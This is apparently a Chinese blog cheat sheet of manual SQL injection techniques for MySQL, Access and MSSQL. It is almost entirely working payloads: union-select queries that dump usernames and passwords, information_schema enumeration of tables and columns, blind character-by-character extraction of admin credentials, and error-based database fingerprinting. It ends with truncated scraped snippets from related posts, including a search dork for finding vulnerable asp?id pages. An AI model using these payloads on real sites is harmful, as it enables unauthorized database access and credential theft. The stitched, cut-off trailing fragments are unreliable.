SQL手工注入技巧

2022-09-06 05:48:10 字數 2070 閱讀 5661

mysql篇

1.內建函式和變數

@@datadir,version(),database(),user(),load_file(),outfile()
2.利用concat(),group_concat(),concat_ws()拼接查詢結果

例項:

***.php?id=1 and 1=2 union select 1,

group_concat(username,0x3a,password),3 from user

3.使用內建資料庫查詢表段和字段

查表段:

***.php?id=1 and 1=2 union select 1,2,table_name from 

(select * from information_schema.tables where table_schema=資料庫名的hex

order by table_schema limit 0,1)t limit 1–

查字段:

***.php?id=1 and 1=2 union select 1,2,column_name from 

(select * from information_schema.columns where table_name=表名的hex

and table_schema=資料庫名hex值 order by 1 limit 1,1)t limit 1–

這裡可以再結合下concat的拼接功能

***.php?id=1 and 1=2 union select 1,2,group_concat(column_name,0x20) 

from (select * from information_schema.columns where table_name=表名的hex

and table_schema=資料庫名hex值 order by 1 limit 0,n)t limit 1–

[n表示第n條資料]

access篇

猜表名

*.asp?id=1 and exists (select * from admin)
猜列名

*.asp?id=1 and exists (select password from admin)
order by查詢

*.asp?id=1 order by 3
union 查詢

*.asp?id=1 union select 1,password,3 from admin
不支援union的情況

先判斷內容的長度

*.asp?id=132 and (select top 1 len(user) from admin) >5
然後乙個乙個猜

*.asp?id=132 and (select top 1 asc(mid(user,1,1)) from admin)>97
例如確定asc(mid(user,1,1))的值是97,即可判斷出user的第乙個字元為a

確定了之後繼續從第二個位置猜

*.asp?id=132 and (select top 1 asc(mid(user,2,1)) from admin)>97
以此類推

mssql篇

基於報錯的mssql注入:

判斷是否是mssql

'and exists (select * from sysobjects) --
如果返回正常,就說明是mssql,否則當sysobjects不存在,是會報錯的。

猜表名:

'and exists(select * from admin)--
如果存在,會返回正常頁面,否則報錯,就是不存在。

SQL手工注入

site xx.cn inurl asp?id 找文章 xx.cn pth onews.asp?id 243 試注入 xx.cn pth onews.asp?id 243 order by 10 xx.cn pth onews.asp?id 243 order by 20 order by 語句用於...

sql注入 手工注入

表示式 描述union 將查詢結果進行聯合輸出,追加在列尾 union all load 檔案讀取 into outfile 檔案寫入 datadir 資料庫檔案存放路徑 user 當前使用者 version 資料庫版本 database 資料庫名稱 表示系統變數 資料庫 表名描述 informat...

sql手工注入原理

純粹一些個人練習心得,所以今天就寫一篇部落格記錄一下 數值型 1.url輸入 and 1 1 and 1 2 回顯頁面不同 整形判斷 如果頁面執行錯誤,則說明此 sql 注入為數字型注入。因為當我們輸入 and 1 1時,後台執行 sql 語句 如 select from 表名 where id x...